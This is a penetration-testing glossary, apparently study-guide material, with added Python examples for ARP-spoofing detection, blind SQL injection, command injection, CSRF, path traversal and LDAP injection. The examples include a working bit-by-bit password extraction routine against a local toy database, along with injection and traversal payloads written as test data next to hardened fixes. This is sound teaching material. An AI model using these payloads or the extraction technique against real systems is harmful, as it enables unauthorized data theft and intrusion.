Glossary of Key Terms

A

access control vestibule A small space with typically two sets of interlocking doors (one of which must close before the second door opens). Formerly known as a mantrap.

account takeover An attack in which an attacker gains control of a user’s account, typically by obtaining the account credentials (for example, through phishing, credential stuffing, or reuse of a password leaked elsewhere).

active reconnaissance A method of information gathering whereby the tools used actually send out probes to the target network or systems in order to elicit a response that is then used to determine its posture.

administrative controls Policies, rules, or training that are designed and implemented to reduce risk and improve safety.

APK Studio A cross-platform and open-source tool for reverse engineering Android applications. You can download APK Studio from https://vaibhavpandey.com/apkstudio/.

ApkX An Android APK decompiler. ApkX can be downloaded from https://github.com/b-mueller/apkx.

arithmetic operator A mathematical operation (such as addition, subtraction, multiplication, division, or modulus) that performs a calculation on two operands.

ARP cache poisoning A type of attack that leads to an on-path attack scenario. It can target hosts, switches, and routers connected to a Layer 2 network by poisoning the ARP caches of systems connected to the subnet and by intercepting traffic intended for other hosts on the subnet. Also known as ARP spoofing.
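Worked example (added here; not part of the original glossary): a small detector for the two symptoms of ARP cache poisoning, an IP address whose MAC mapping changes and one MAC that suddenly claims several IP addresses. ARP_REPLIES is constructed sample data standing in for parsed packets from a capture or for periodic `ip neigh` / `arp -a` snapshots; the threshold is an assumption.

```python
"""Detect ARP cache poisoning from observed ARP replies.

Added example, not from the glossary. ARP_REPLIES is constructed sample
data; in practice feed it from a packet capture or periodic neighbour-table
snapshots on each host.
"""
from collections import defaultdict

# Constructed sample: (sequence number, sender IP, sender MAC) from ARP replies.
ARP_REPLIES = [
    (1, "10.0.0.1", "00:11:22:33:44:01"),  # gateway announces its real MAC
    (2, "10.0.0.5", "00:11:22:33:44:05"),
    (3, "10.0.0.7", "00:11:22:33:44:07"),
    (4, "10.0.0.1", "DE:AD:BE:EF:00:01"),  # gateway IP now claimed by another MAC
    (5, "10.0.0.5", "de:ad:be:ef:00:01"),  # the same MAC also claims a host IP
    (6, "10.0.0.1", "de:ad:be:ef:00:01"),  # repeat of a known mapping: no new alert
]


def detect_arp_poisoning(replies, max_ips_per_mac=1):
    """Return alert strings for IP->MAC changes and for MACs claiming too many IPs.

    Both signals are typical of ARP spoofing: the attacker answers for the
    gateway (and often for victims too), so one MAC suddenly "owns" several IPs.
    """
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for seq, ip, mac in replies:
        mac = mac.lower()          # normalise case before comparing
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"#{seq}: {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > max_ips_per_mac:
                alerts.append(f"#{seq}: {mac} now claims {len(mac_to_ips[mac])} IPs: "
                              + ", ".join(sorted(mac_to_ips[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(ARP_REPLIES):
        print(alert)
```

IP-to-MAC changes also happen legitimately (DHCP reassignment, VRRP/HSRP gateway failover, a replaced NIC), so in practice compare against a known-good mapping for the gateway rather than alerting on every change. On the network side, static ARP entries for the gateway and Dynamic ARP Inspection on the switches prevent the poisoning itself.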

array A special variable that holds more than one value at a time.

authenticated scan A vulnerability scan in which the user provides the scanner with a set of credentials that give it access to the target system (often administrative or root-level access, so that installed software, patch levels, and configuration can be inspected from the inside). Most of the time it is best to run this type of scan against a target to get a full picture of the attack surface.

authority A social engineering technique whereby an attacker uses confidence and legal, organizational, or social authority to convince targets to reveal information.

B

badge cloning attack An attack in which an attacker clones a badge or a card used to access a building. This can be done with specialized software and hardware. It can also be carried out with the aid of social engineering techniques to impersonate employees/authorized users to enter a building with a simple badge copy.

Bash shell A Linux/Unix shell and command language written by Brian Fox as a replacement for the Bourne shell.

bind shell A shell in which the compromised system opens a port or a listener and waits for a connection. The attacker then connects to that port from any system to execute commands and further manipulate the victim. Because the victim must accept an inbound connection, a bind shell is often blocked by inbound firewall rules; compare with a reverse shell.

BLE attack An attack launched against a Bluetooth Low Energy (BLE) implementation.

blind (or inferential) SQL injection A type of attack in which the attacker does not make the application display or transfer any data but instead reconstructs the information by sending specific statements and discerning the behavior of the application and database.

BloodHound A single-page JavaScript web application that uses graph theory to reveal the hidden relationships within a Windows Active Directory environment.

Bluejacking An attack that can be performed by using Bluetooth with vulnerable devices in range and is mostly performed as a form of spam over Bluetooth connections. An attacker sends unsolicited messages to the victim over Bluetooth, including a contact card (vCard) that typically contains a message in the name field.

Bluesnarfing A type of attack whose aim is to obtain unauthorized access to information from a Bluetooth-enabled device. An attacker may launch Bluesnarfing attacks to access calendars, contact lists, emails and text messages, pictures, or videos from victims.

Boolean operator A programming language construct that evaluates to true or false.

Boolean SQL A technique typically used in blind SQL injection attacks in which the attacker injects conditions that evaluate to true or false and observes whether the application’s response differs (for example, a normal page versus an empty result or error). By chaining many such true/false questions, the attacker infers database contents one character or bit at a time without the application ever displaying the data.
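Worked example for the blind (inferential) SQL injection and Boolean SQL entries (added here; not part of the original glossary): an endpoint that only answers “user exists” or not is enough to recover a password bit by bit. The in-memory SQLite table, the vulnerable function, and the password value are constructed stand-ins; the parameterized version is shown beside it so the same probes can be seen to fail.

```python
"""Boolean-based blind SQL injection, end to end.

Added example, not from the glossary. The SQLite table and the two
user_exists functions are constructed stand-ins for a web endpoint that
only reveals whether a query matched; the password is made up.
"""
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def user_exists_vulnerable(conn, name):
    """Vulnerable: untrusted input is concatenated into the SQL text.

    The caller learns only True or False, which is exactly what a blind
    injection needs.
    """
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, name):
    """Fixed: a bound parameter is data, never SQL, so the probes below fail."""
    sql = "SELECT 1 FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone() is not None


def extract_password(oracle, max_len=32):
    """Recover the admin password one bit at a time through a true/false oracle.

    Each probe asks "is bit B of character P of the password set?". SQLite's
    unicode() returns NULL past the end of the string, so every bit reads as
    false there and the loop stops.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):          # 7 probes per ASCII character
            probe = (f"admin' AND (unicode(substr(password, {pos}, 1)) "
                     f"& {1 << bit}) > 0 -- ")
            if oracle(probe):
                code |= 1 << bit
        if code == 0:                         # past the end of the string
            break
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    db = build_db()
    leak = extract_password(lambda n: user_exists_vulnerable(db, n))
    print("vulnerable endpoint leaks:", leak)
    nothing = extract_password(lambda n: user_exists_safe(db, n))
    print("parameterized endpoint leaks:", repr(nothing))
```

Seven requests per character is the cost of the bitwise approach; a binary search on the character value needs about the same number and is what sqlmap does. The important point for defenders is that the response body never contained the password: the only leak was the difference between a match and a non-match, so rate limiting and query logging matter as much as output encoding.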

Browser Exploitation Framework (BeEF) A tool that hooks users’ web browsers by leveraging XSS vulnerabilities and then uses the hooked browsers to launch further client-side attacks and gather information.

Burp Suite A collection of tools (including web proxy capabilities) that are used to find vulnerabilities in web applications. You can download Burp Suite from https://portswigger.net/burp/communitydownload.

business logic flaw A method of entry in which an attacker uses legitimate transactions and flows of an application in a way that results in a negative behavior or outcome.

C

Cain A password cracking tool for Windows.

call spoofing tool A tool used to change the caller ID information that is displayed on a phone, typically as part of a social engineering attack.

Censys A company that provides information about Internet threats and threat intelligence and that maintains a database of OSINT information that can be used in passive reconnaissance.

certificate pinning The process of associating a mobile app with a particular server certificate (or its public key) so that the app accepts only that certificate rather than any certificate signed by a trusted CA. This reduces the attack surface for on-path attacks that rely on a mis-issued or attacker-installed CA certificate, at the cost of complicating certificate rotation.

CeWL A tool that can be used to create wordlists from websites.

class A code template that can be used to create objects. Classes provide initial values for state variables and implement member functions and/or methods.

cloud malware injection attack An attack in which malware is injected into cloud-based applications.

command and control (C2 or CnC) A type of system that attackers use to send commands and instructions to compromised systems. A C2 can be an attacker’s system (desktop, laptop, and so on) or a dedicated virtual or physical server. Attackers often use virtual machines in a cloud service or even other compromised systems or services such as Twitter or Dropbox. C2 communication can be as simple as maintaining a timed beacon, or “heartbeat,” to launch additional attacks or for data exfiltration.

command injection An attack in which the attacker tries to execute commands that he or she is not supposed to be able to execute on a system via a vulnerable application. Command injection attacks are possible when an application does not validate data supplied by the user (for example, data entered in web forms, cookies, HTTP headers, and other elements). The vulnerable system passes that data into a system shell. This type of attack involves trying to send operating system commands so that the application can execute them with the privileges of the vulnerable application.
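Worked example (added here; not part of the original glossary): the vulnerable pattern the entry describes beside its hardened form. `echo` stands in for the ping or nslookup binary a real “network diagnostics” page would invoke, so the block runs anywhere with a POSIX sh; the hostname allowlist rule is an assumption.

```python
"""Command injection: the vulnerable pattern beside the hardened one.

Added example, not from the glossary. `echo` replaces the ping/nslookup
binary a real diagnostics page would call; the hostname rule is an
assumption and is stricter than what every application needs.
"""
import re
import subprocess

# Allowlist: only characters that can appear in a DNS hostname, 1-253 chars.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def lookup_vulnerable(target):
    """shell=True hands the whole string to /bin/sh, so ';', '|', '$(...)'
    and friends inside `target` become extra commands run as the app user."""
    result = subprocess.run("echo " + target, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def is_valid_hostname(target):
    return HOSTNAME_RE.fullmatch(target) is not None


def lookup_safe(target):
    """Hardened: validate against an allowlist, then pass an argv list so the
    value reaches the program as one argument and no shell is involved."""
    if not is_valid_hostname(target):
        raise ValueError(f"rejected target: {target!r}")
    result = subprocess.run(["echo", target], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    payload = "example.com; echo INJECTED"
    print(lookup_vulnerable(payload), end="")   # both commands run
    print(lookup_safe("example.com"), end="")
    try:
        lookup_safe(payload)
    except ValueError as err:
        print(err)
```

Both halves of the fix matter: the argv list removes the shell, and the allowlist stops option injection (a target such as `-f` would still be interpreted by the called program itself). `shlex.quote` is a fallback when a shell genuinely cannot be avoided, not a substitute for either.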

comma-separated values (CSV) A plaintext file that contains data delimited by commas (,) and sometimes tabs or other characters, such as semicolons (;).

compliance scan A scan that is typically driven by the market or governance that the environment serves. An example of this would be the information security environment for a healthcare entity, which would be beholden to the requirements set forth in HIPAA.

conditional A programming language command that is used for handling decisions.

covert channel An adversarial technique in which an attacker transfers information objects between processes or systems that are not supposed to be allowed to communicate, according to a security policy.

CrackMapExec A post-exploitation tool that can be used to automate the assessment of Active Directory (AD) networks. You can obtain more information about CrackMapExec from https://github.com/byt3bl33d3r/CrackMapExec.

credential harvesting The act of stealing credentials from systems.

cross-site request forgery (CSRF/XSRF) A type of attack that involves unauthorized commands being transmitted from a user who is trusted by the application. CSRF is different from XSS in that it exploits the trust that an application has in a user’s browser. CSRF vulnerabilities are also referred to as “one-click attacks” or “session riding.” CSRF attacks typically affect applications (or websites) that rely on a user’s identity.
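Worked example (added here; not part of the original glossary): a synchronizer token bound to the session with an HMAC, which is the standard defense against the attack the entry describes. The dictionary-based handler is a constructed stand-in for a web framework’s request handler; the server key and session IDs are assumptions.

```python
"""CSRF protection with a per-session synchronizer token.

Added example, not from the glossary. handle_transfer() is a constructed
stand-in for a framework request handler; SERVER_KEY and the session IDs
are assumptions.
"""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumed server-side secret


def issue_csrf_token(session_id):
    """Token = random nonce + HMAC(server_key, session_id || nonce).

    Binding the MAC to the session means a token the attacker obtained for
    their own session is useless against the victim's session.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def handle_transfer(session_id, form):
    """State-changing POST handler. A forged cross-site request carries the
    victim's session cookie automatically but cannot read the token that was
    embedded in the page, so it is refused here."""
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {form.get('amount')} to {form.get('to')}"


if __name__ == "__main__":
    victim = "session-victim"
    token = issue_csrf_token(victim)
    print(handle_transfer(victim, {"csrf_token": token, "amount": "10", "to": "bob"}))
    # Cross-site form post: the cookie rides along, the token does not.
    print(handle_transfer(victim, {"amount": "1000", "to": "mallory"}))
    # Attacker submits a token issued to their own session.
    attacker_token = issue_csrf_token("session-attacker")
    print(handle_transfer(victim, {"csrf_token": attacker_token, "amount": "1000", "to": "mallory"}))
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a complementary control that stops most cross-site submissions before they reach the handler, but the token remains the check that does not depend on browser behaviour.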

cross-site scripting (XSS) A very common web application vulnerability that can lead to installation or execution of malicious code, account compromise, session cookie hijacking, revelation or modification of local files, or site redirection. There are three major types of XSS: reflected XSS, stored (persistent), and DOM-based XSS.

C-suite The upper or executive-level managers within a company. Common C-suite executives include chief executive officer (CEO), chief financial officer (CFO), chief operating officer (COO), chief information officer (CIO), and chief security officer (CSO).

D

data exfiltration The act of deliberately moving sensitive data from inside an organization to outside an organization’s perimeter without permission.

denial-of-service (DoS) attack An attack that is meant to bring down a system or a network and cause disruption.

dependency vulnerability A vulnerability in a third-party library, package, or component that an application depends on. Because dependencies are often pulled in transitively, an application can be exposed even though none of its own code contains the flaw.

dictionary A collection of data values stored as key/value pairs, in which each value is looked up by its key.

DirBuster A web application directory enumeration tool.

directory traversal A vulnerability that can allow an attacker to access files and directories that are stored outside the web root folder. Also known as path traversal.
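Worked example (added here; not part of the original glossary): confining a user-supplied path to the web root, which is the check whose absence produces the vulnerability. The base directory and request paths are assumptions, and nothing is read from disk, so the block runs anywhere.

```python
"""Directory (path) traversal: confining user-supplied paths to a web root.

Added example, not from the glossary. The web root and the request paths
are assumptions; no file is opened, so the check can run anywhere.
"""
import os


def resolve_under(base_dir, user_path):
    """Return the absolute path for `user_path` inside `base_dir`, or raise.

    realpath() collapses '..' and follows symlinks; commonpath() then proves
    the result is still inside the root. A plain startswith() check is not
    enough: '/srv/www/static2/x' starts with '/srv/www/static'.
    Run this on the fully URL-decoded path, decoded exactly once.
    """
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes web root: {user_path!r}")
    return target


def is_within(base_dir, user_path):
    try:
        resolve_under(base_dir, user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    root = "/srv/www/static"            # assumed web root
    for p in ["css/site.css", "../../../etc/passwd", "/etc/passwd",
              "../static2/secret.txt", "a/../b.txt"]:
        verdict = "allowed" if is_within(root, p) else "rejected"
        print(f"{p!r:28} -> {verdict}")
```

Note that `os.path.join` discards the base when the user path is absolute, which is why `/etc/passwd` must be rejected by the containment check rather than by the join. Encoded variants (`%2e%2e%2f`, overlong UTF-8) are a decoding problem: decode once, then run this check on the result.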

direct-to-origin attack An attack in which an attacker attempts to reveal the origin network or IP address of a system and attack it directly, thus bypassing anti-DDoS mitigations provided by CDN implementations.

disassociation attack An attack in which an attacker disassociates (tries to disconnect) the user from the authenticating wireless AP and then carries out another attack to attain the user’s valid credentials.

discovery scan A type of vulnerability scan that is primarily meant to identify the attack surface of a target. A port scan is a major part of a discovery scan.

DNS cache poisoning The manipulation of the DNS resolver cache through the injection of corrupted DNS data. This is done to force the DNS server to send the wrong IP address to the victim, redirecting the victim to the attacker’s system.

DNS lookup A method used to determine the IP address or addresses of a domain and its subdomains.

domain enumeration The process of determining all the subdomains that are being used by a target. Domain enumeration helps a penetration tester determine what kinds of systems the target is running and where testing should go next. It often uncovers subdomains that may have been forgotten, which could open up paths to exploitation.

Drozer An Android testing platform and framework that provides access to numerous exploits that can be used to attack Android platforms. You can download Drozer from https://labs.f-secure.com/tools/drozer.

Dumpster diving A process in which an unauthorized individual searches for and attempts to collect sensitive information from the trash.

E

Empire An open-source PowerShell-based post-exploitation framework.

ethical hacker A person who hacks into a computer network in order to test or evaluate its security rather than with malicious or criminal intent.

Ettercap A tool used to perform on-path attacks. You can download Ettercap from https://www.ettercap-project.org.

evil twin An attack in which an attacker creates a rogue access point and configures it exactly the same as the existing corporate network.

Exif Exchangeable image file format, a standard for metadata embedded in image files, such as the camera make and model, capture date and time, and GPS coordinates. Exif data in images published on a target’s website can reveal information that is useful during reconnaissance.

Extensible Markup Language-Remote Procedure Call (XML-RPC) A protocol in legacy applications that uses XML to encode calls and leverages HTTP as a transport mechanism.

F

fear A social engineering technique whereby an attacker convinces a victim to act quickly to avoid or rectify a dangerous or painful situation.

Federal Risk and Authorization Management Program (FedRAMP) A standard used by the U.S. government to authorize the use of cloud service offerings. You can obtain information about FedRAMP at https://www.fedramp.gov.

federated authentication A method of associating a user’s identity across different identity management systems. For example, every time that you access a website, web application, or mobile application that offers you to log in or register with your Facebook, Google, or Twitter account, that application is using federated authentication.

fileless malware Malicious activity that runs in memory and uses legitimate tools and installed applications in Windows, Linux, or macOS (such as PowerShell or WMI) to perform post-exploitation activities, rather than writing a new executable to disk where it could be scanned. Also referred to as living-off-the-land.

Fingerprinting Organization with Collected Archives (FOCA) A tool used to find metadata and hidden information in documents.

Frida A reverse engineering and instrumentation toolkit that can be downloaded from https://frida.re.

full scan A scan in which every scanning option in the scan policy is enabled. Although the options vary depending on the scanner, most vulnerability scanners have similar categories of options defined.

function A named, reusable piece of code that is useful when you need to execute similar tasks over and over.

G

GDB The GNU Project Debugger, a debugger that runs in many Unix-based systems and that supports several programming languages, including C, C++, Objective-C, Fortran, and Go.

General Data Protection Regulation (GDPR) A European regulation that includes strict rules around the processing of data and privacy. One of the GDPR’s main goals is to strengthen and unify data protection for individuals within the European Union (EU), while addressing the export of personal data outside the EU. You can obtain additional information about GDPR at https://gdpr-info.eu.

Gobuster A directory and file enumeration tool.

group enumeration The process of gathering a valid list of groups in order to understand the authorization roles being used on a target system. An attacker may perform group enumeration after gaining access to the internal network.

H

Hashcat A powerful password cracking tool.

Health Insurance Portability and Accountability Act of 1996 (HIPAA) A standard and regulation that protects an individual’s electronic health information while permitting appropriate access and use of that information by healthcare providers and other entities. Information about HIPAA can be obtained from https://www.cdc.gov/phlp/publications/topic/hipaa.html.

horizontal privilege escalation The process of using a regular user account to access functions or content that belong to another user at the same privilege level (for example, viewing another customer’s orders). Compare with vertical privilege escalation, in which a user gains higher privileges, such as root or administrator.

host enumeration The process of discovering all the hosts, applications, and systems in a network that could be targeted. It can be performed internally and externally, using a tool such as Nmap or Masscan. External host enumeration typically limits the IP addresses being scanned to just the ones that are within the scope of the test. This reduces the chance of inadvertently scanning an IP address that the tester is not authorized to test. When performing an internal host enumeration, a tester typically scans the full subnet or subnets of IP addresses being used by the target.

Hydra A tool that can be used to perform brute-force attacks.

I

IDA A commercial reverse engineering tool.

identity and access management (IAM) The process of administering user and application authentication and authorization. Key IAM features include single sign-on (SSO), multifactor authentication, and user provisioning and life cycle management.

Immunity Debugger A debugger that can be used to disassemble and reverse engineer programs. You can obtain additional information about the Immunity Debugger at https://www.immunityinc.com/products/debugger/

Impacket tools A collection of Python classes for working with network protocols that can be downloaded from https://github.com/SecureAuthCorp/impacket.

impersonation See pretexting.

industrial control system (ICS) A type of system that is used in manufacturing plants, industrial process control, nuclear power plants, water control systems, and other critical infrastructure.

Industrial Internet of Things (IIoT) A network of industrial control systems connected to the Internet.

Information Systems Security Assessment Framework (ISSAF) A penetration testing methodology that consists of the following phases: information gathering, network mapping, vulnerability identification, penetration, gaining access and privilege escalation, enumerating further, compromising remote users/sites, maintaining access, and covering the tracks.

insider threat A threat that occurs when an entity has authorized access (that is, within the security domain) and could potentially harm an information system or enterprise through destruction, disclosure, modification of data, and/or DoS.

Intelligent Platform Management Interface (IPMI) A computer interface that is used in many modern servers and provides management and monitoring capabilities independently of the underlying operating system, system CPU, and firmware.

J

jamming Blocking wireless signals or causing wireless network interference to create a full or partial DoS condition in a wireless network.

JavaScript A very popular programming language used to build web applications.

JavaScript Object Notation (JSON) A lightweight format for storing and transporting data that is easy to understand. It is the most common data structure in RESTful APIs and many other implementations.

job rotation The practice of allowing employees to rotate from one team to another or from one role to a different one. It allows individuals to learn new skills and get more exposure to other security technologies and practices.

John the Ripper A password cracking tool.

K

Kerberoasting A post-exploitation activity in which an attacker with any valid domain account requests Kerberos service tickets (TGS) for accounts that have service principal names (SPNs) registered in Active Directory. Part of each ticket is encrypted with the service account’s password hash, so the tickets can be extracted and cracked offline to recover the service account’s password.

key rotation The process of retiring an encryption key and replacing it by generating a new cryptographic key.

key/value pair A data representation of a name and a value. Also referred to as name/value pair or field/value pair.

known-environment testing Testing in which the tester starts out with a significant amount of information about the organization and its infrastructure (for example, network diagrams, IP addresses, configurations, and a set of user credentials). The goal with this type of test is to identify as many security holes as possible. Formerly known as white-box penetration testing.

L

lateral movement A post-exploitation technique in which an attacker moves from one compromised device to other devices in the environment to avoid detection, reach sensitive data, and maintain access for exfiltrating that data. It is often performed by pivoting through a compromised host, so the term is sometimes used interchangeably with pivoting.

LDAP injection An input validation vulnerability that an attacker uses to inject and execute queries to LDAP servers. A successful LDAP injection attack can allow an attacker to obtain valuable information for further attacks on databases and internal applications.
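Worked example (added here; not part of the original glossary): a login filter built from raw input beside the same filter with RFC 4515 escaping applied, which is the fix for the injection the entry describes. The filter template and the sample payload are assumptions; no directory server is contacted.

```python
"""LDAP injection: escaping user input before it enters a search filter.

Added example, not from the glossary. The filter template and sample
inputs are assumptions; nothing talks to a directory server.
"""

# RFC 4515 escapes for the characters that carry meaning inside a filter
# value. Each input character is mapped once, so backslashes are never
# escaped twice.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Encode a value for use inside an LDAP search filter (RFC 4515)."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter_vulnerable(username, password):
    """Vulnerable: raw input is spliced into the filter, so '*' and ')' from
    the user change its structure."""
    return f"(&(uid={username})(userPassword={password}))"


def login_filter_safe(username, password):
    """Hardened: the same template with every untrusted value escaped."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


if __name__ == "__main__":
    # Classic payload: close the uid clause and OR in a wildcard so the
    # password clause no longer constrains the match.
    user, pwd = "*)(uid=*))(|(uid=*", "wrong"
    print(login_filter_vulnerable(user, pwd))
    print(login_filter_safe(user, pwd))
```

Escaping for filter values (RFC 4515) is different from escaping for distinguished names (RFC 4514), so a value that ends up in a DN needs the other routine. Separately, checking `userPassword` inside a search filter is itself a weak design; the usual pattern is to locate the entry and then bind as that user with the supplied password.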

library A collection of resources that can be reused by programs.

likeness A social engineering tactic that takes advantage of the fact that individuals can be influenced by things or people they like. Social engineers take advantage of this human vulnerability to manipulate their victims.

list A data structure in a programming language that contains an ordered assortment of elements.

living-off-the-land The use of legitimate tools and installed applications in Windows, Linux, or macOS to perform post-exploitation activities. Also referred to as fileless malware.

loop A programming logic construct used for repeated execution of a section of code.

M

Maltego A passive reconnaissance tool that can be used to obtain information about people, companies, and other targets.

master service agreement (MSA) A contract that can be used to quickly negotiate the work to be performed. An MSA is beneficial when you perform a penetration test, and you know that you will be rehired on a recurring basis to perform additional tests in other areas of the company or to verify that the security posture of the organization has been improved as a result of prior testing and remediation.

Media Access Control (MAC) spoofing An attack in which a threat actor impersonates the MAC address of another device (typically an infrastructure device such as a router).

Medusa A password cracking tool.

metadata service attack An attack in which an attacker leverages cloud metadata services to compromise the underlying application or system.

Metasploit A collection of tools and modules that can be used to exploit numerous vulnerabilities, for command and control, and to create payloads.

Meterpreter A post-exploitation module that is part of the Metasploit framework.

Mimikatz An open-source tool, routinely flagged as malware by security products, that attackers and penetration testers use to gather credentials (plaintext passwords, NTLM hashes, and Kerberos tickets) from memory on Windows computers.

mitm6 An on-path attack tool that abuses Windows’ preference for IPv6 by answering DHCPv6 requests on an IPv4-only network so that it becomes the victims’ DNS server and can spoof name resolution.

MITRE ATT&CK A publicly available knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. Penetration testers and red teams use it to plan and describe their activities, and defenders use it to map detections and controls to specific attacker techniques.

Mobile Security Framework (MobSF) A mobile application pen testing and malware analysis framework that can be downloaded from https://github.com/MobSF/Mobile-Security-Framework-MobSF.

N

Nessus A vulnerability scanner created by Tenable.

network share enumeration The process of identifying systems on a network that are sharing files, folders, and printers, which is helpful in building out the attack surface of the internal network.

Nikto An open-source web application vulnerability scanner.

NIST The National Institute of Standards and Technology, which is a part of the U.S. Department of Commerce that helps provide organizations with guidelines on planning and conducting information security testing.

non-disclosure agreement (NDA) A legal document and contract between a penetration tester and an organization that has hired the tester which specifies and defines confidential material, knowledge, and information that should not be disclosed and that should be kept confidential by both parties.

Nslookup A tool used to resolve DNS domain names.

O

OllyDbg A Windows application debugger.

on-path attack An attack in which an attacker places himself or herself in-line between two devices or individuals that are communicating in order to eavesdrop (steal sensitive data) or manipulate the data being transferred (such as performing data corruption or data modification). On-path attacks can happen at Layer 2 or Layer 3. Previously known as man-in-the-middle (MITM) attack.

open-source intelligence (OSINT) gathering A method of gathering publicly available intelligence sources in order to collect and analyze information about a target. With OSINT, the collecting of information does not require any type of covert methods.

Open Source Security Testing Methodology Manual (OSSTMM) A document that lays out repeatable and consistent security testing.

Open Vulnerability Assessment Scanner (OpenVAS) An open-source security vulnerability scanner.

Open Web Application Security Project (OWASP) A nonprofit organization with local chapters around the world that provides significant guidance on how to secure applications.

operational controls Controls that focus on day-to-day operations and strategies. They are implemented by people instead of machines and ensure that management policies are followed during intermediate-level operations.

OWASP Top 10 A list of the top 10 application security risks published by OWASP.

OWASP Zed Attack Proxy (ZAP) An open-source web application security scanner and intercepting proxy maintained by OWASP. It is used to find web application vulnerabilities (including HTTP parameter pollution (HPP)) by proxying, crawling, and actively scanning an application.

P

passive reconnaissance A method of information gathering in which the tool does not interact directly with the target device or network. There are multiple methods of passive reconnaissance. Some involve using third-party databases to gather information, and others use tools in such a way that they will not be detected by the target.

Patator A multithreaded tool that can be used to perform password guessing attacks and that can be downloaded from https://github.com/lanjelot/patator.

patching fragmentation A challenge in Android-based implementations that is related to the numerous Android versions that are supported or not supported by different mobile devices. Attackers can leverage these compatibility issues and limitations to exploit vulnerabilities.

PCI DSS The Payment Card Industry Data Security Standard, an industry standard (rather than a government regulation) maintained by the PCI Security Standards Council that aims to secure the processing, storage, and transmission of cardholder data for credit card payments and other types of digital payments. PCI DSS specifications, documentation, and resources can be accessed at https://www.pcisecuritystandards.org.

penetration testing Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, a system, or a network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

Penetration Testing Execution Standard (PTES) A penetration testing methodology standard/guidance document that provides information about types of attacks and methods and also provides information on the latest tools available to accomplish the testing methods outlined.

Perl A programming language. You can download and obtain information about Perl at perl.org.

phishing A threat in which an attacker presents to a user a link or an attachment that looks like a valid, trusted resource. When the user clicks it, he or she is prompted to disclose confidential information such as a username and password.

physical controls Controls that use security measures to prevent or deter unauthorized access to sensitive locations or material.

port scan An active scan in which the scanning tool sends various types of probes to the target IP address and examines the responses to determine whether the service is actually listening.

Postman An application used to test APIs.

PowerShell A Windows command language and shell.

PowerShell [PS] Remoting A basic feature that a system administrator can use to access and manage a system remotely. An attacker can also take advantage of this feature to perform post-exploitation activities.

PowerSploit A collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment.

pretexting A form of impersonation in which a threat actor presents himself or herself as someone else in order to gain access to information.

privilege escalation The act of gaining access to resources that normally would have been protected from an application or a user. There are two types of privilege escalation attacks: vertical and horizontal.

procedure A section of code that is created to perform a specific task.

PsExec A Sysinternals utility used for executing processes on a remote Windows system, typically over SMB with administrative credentials.

Python A very popular programming language that can be used to create numerous types of applications.

R

rainbow table A precomputed table of hash chains, built from a wordlist or character set, that is used to reverse a password hash by looking up the hashed value. Rainbow tables work only against unsalted hashes; a per-password salt forces the table to be rebuilt for every salt value, which defeats the precomputation.

reconnaissance The first step a threat actor takes when planning an attack, which involves gathering information about the target.

Recon-ng A passive reconnaissance tool that supports different modules and integrations with third-party tools and resources.

reflected XSS A non-persistent form of XSS in which the malicious script is supplied as part of the HTTP request (for example, in a URL parameter or form field) and is immediately echoed back in the application’s response without proper output encoding. The victim is typically tricked into clicking a crafted link that carries the payload.

Responder A tool that can be used to respond to LLMNR and NBT-NS requests and steal credentials. You can download Responder from https://github.com/lgandx/Responder.

RESTful API A type of application programming interface (API) that conforms to the specification of the representational state transfer (REST) architectural style and allows for interaction with web services.

reverse engineering A detailed examination of a system’s or software composition. Attackers use reverse engineering techniques to understand how a device, process, or program was designed and constructed in order to exploit it. Similarly, security professionals use reverse engineering techniques to analyze malware.

reverse shell A shell in which the attacking system runs a listener (open port) and the victim initiates a connection back to the attacking system, after which the attacker sends commands over that connection. Because the connection is outbound from the victim, it often passes through firewalls that block inbound connections.

role-based access control An access control model based on a specific role or function. Administrators grant access rights and permissions to roles. Users are then assigned one or more roles and inherit the permissions of those roles.

